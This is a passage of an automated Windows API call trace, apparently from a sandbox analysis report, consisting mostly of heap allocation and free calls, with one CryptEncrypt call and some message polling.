dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0210.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0210.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0210.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0210.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0210.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.948] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0210.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0210.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0210.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0210.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0210.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0210.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0210.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0210.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0210.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0210.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0210.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0210.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0210.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0210.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0210.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0210.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0210.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0210.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0210.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0210.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0210.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0210.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0210.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0210.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0210.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0210.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0210.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0210.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0210.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0210.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0210.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0210.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0210.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0210.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0210.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0210.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0210.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0210.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0210.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0210.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0210.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0210.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0210.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0210.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0210.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0210.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0210.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0210.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50bf0 [0210.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50bf0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0210.952] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0210.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0210.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54080 [0210.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0210.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0210.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0210.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0210.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0210.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0210.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0210.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0210.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0210.952] CryptEncrypt (in: hKey=0xa87350, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f404a0*, pdwDataLen=0x8cef60*=0x96cc, dwBufLen=0x96d0 | out: pbData=0x2f404a0*, pdwDataLen=0x8cef60*=0x96d0) returned 1 [0210.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0210.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0210.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0210.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0210.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0210.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0210.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0210.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0210.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0210.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0210.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0210.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0210.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0210.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0210.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0210.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0210.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0210.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0210.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0210.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0210.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0210.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0210.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0210.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0210.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0210.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0210.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0210.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0210.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0210.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0210.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0210.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0210.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0210.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0210.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0210.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0210.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0210.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0210.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0210.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0210.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0210.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0210.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0210.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0210.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0210.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0210.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0210.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0210.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0210.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0210.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0210.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0210.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0210.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0210.959] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0210.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0210.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0210.959] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.959] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.959] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0210.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0210.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0210.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0210.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0210.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0210.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0210.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0210.960] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.960] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0210.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0210.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0210.960] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0210.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0210.961] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0210.961] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0210.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0210.961] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0210.961] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 